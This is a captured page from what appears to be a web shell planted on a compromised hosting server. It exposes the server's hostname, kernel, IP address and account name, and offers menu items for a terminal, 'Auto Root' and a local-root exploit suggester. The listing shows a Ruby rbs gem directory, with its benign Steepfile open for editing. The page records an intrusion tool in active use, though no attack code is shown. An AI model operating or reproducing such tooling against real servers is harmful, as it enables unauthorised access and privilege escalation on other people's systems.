Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
gems /
gems /
rbs-3.8.0 /
Delete
Unzip
Name
Size
Permission
Date
Action
core
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
docs
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
exe
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
include
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
lib
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
schema
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
sig
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
src
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
stdlib
[ DIR ]
drwxr-xr-x
2026-04-07 16:50
templates
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
BSDL
1.25
KB
-rw-r--r--
2026-04-07 16:50
CHANGELOG.md
88.89
KB
-rw-r--r--
2026-04-07 16:51
COPYING
2.38
KB
-rw-r--r--
2026-04-07 16:50
README.md
6.41
KB
-rw-r--r--
2026-04-07 16:50
Rakefile
11.48
KB
-rw-r--r--
2026-04-07 16:50
Steepfile
1.14
KB
-rw-r--r--
2026-04-07 16:50
config.yml
7.04
KB
-rw-r--r--
2026-04-07 16:50
exts.mk
2.48
KB
-rw-r--r--
2026-04-07 16:50
goodcheck.yml
2.37
KB
-rw-r--r--
2026-04-07 16:50
Save
Rename
D = Steep::Diagnostic target :lib do signature "sig" check "lib" ignore( "lib/rbs/test", # "lib/rbs/test.rb" ) library "pathname", "json", "logger", "monitor", "tsort", "uri", 'dbm', 'pstore', 'singleton', 'shellwords', 'fileutils', 'find', 'digest', 'prettyprint', 'yaml', "psych", "securerandom" signature "stdlib/strscan/0/" signature "stdlib/optparse/0/" signature "stdlib/rdoc/0/" signature "stdlib/ripper/0" signature "stdlib/pp/0" # configure_code_diagnostics do |config| # config[D::Ruby::MethodDefinitionMissing] = :hint # config[D::Ruby::ElseOnExhaustiveCase] = :hint # config[D::Ruby::FallbackAny] = :hint # end end # target :lib do # signature "sig" # # check "lib" # Directory name # check "Gemfile" # File name # check "app/models/**/*.rb" # Glob # # ignore "lib/templates/*.rb" # # # library "pathname", "uri" # Standard libraries # # library "strong_json" # Gems # end # target :spec do # signature "sig", "sig-private" # # check "spec" # # # library "pathname", "uri" # Standard libraries # # library "rspec" # end